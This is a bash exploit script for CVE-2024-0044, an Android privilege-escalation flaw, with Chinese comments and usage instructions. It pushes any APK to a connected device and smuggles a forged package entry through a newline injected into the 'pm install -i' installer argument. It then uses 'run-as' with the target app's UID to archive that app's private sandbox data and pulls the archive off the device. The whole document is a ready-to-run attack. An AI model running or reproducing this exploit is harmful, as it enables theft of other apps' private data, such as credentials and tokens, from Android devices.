CVE-2024-0044.sh

#!/bin/bash
: <<'EOF'
利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。
author by Re13orn

用法:
    ./CVE-2024-0044.sh <apk_path> <package_name>

参数:
    <apk_path>     任意一个本地 APK 文件的路径
    <package_name> 应用包名

示例:
    ./CVE-2024-0044.sh /path/to/target.apk com.target.mobile
EOF

# 从命令行获取变量
APK_PATH=$1
PACKAGE_NAME=$2

# 检查是否提供了必要的参数
if [ -z "$APK_PATH" ] || [ -z "$PACKAGE_NAME" ]; then
    echo "Usage: $0 <any_apk_path> <target_package_name>"
    exit 1
fi

# 创建临时过程目录、创建文件并设置权限
adb shell "mkdir -p /data/local/tmp/tempqazmkp/ && touch /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar && chmod -R 0777 /data/local/tmp/tempqazmkp/"
# 推送任意APK文件到设备临时目录
adb push $APK_PATH /data/local/tmp/tempqazmkp/any.apk

# 获取 package的uid
PACKAGEUID=$(adb shell "pm list packages -U | grep $PACKAGE_NAME" | awk -F 'uid:' '{print $2}')

PAYLOAD="@null
victim $PACKAGEUID 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
# 提权并拷贝沙箱文件到指定位置
adb shell <<EOF
PAYLOAD="$PAYLOAD"
pm install -i "\$PAYLOAD" /data/local/tmp/tempqazmkp/any.apk && \
run-as victim sh -c 'tar -cf /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar $PACKAGE_NAME'
EOF

# # 获取文件大小
filesize=$(adb shell "du -s /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar" | awk '{print $1}')
echo "Downloading file: $PACKAGE_NAME.tar (size: $filesize bytes)"

# 下载沙箱文件到本地
adb pull /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar .

# 删除临时文件和目录
adb shell "rm -rf /data/local/tmp/tempqazmkp/"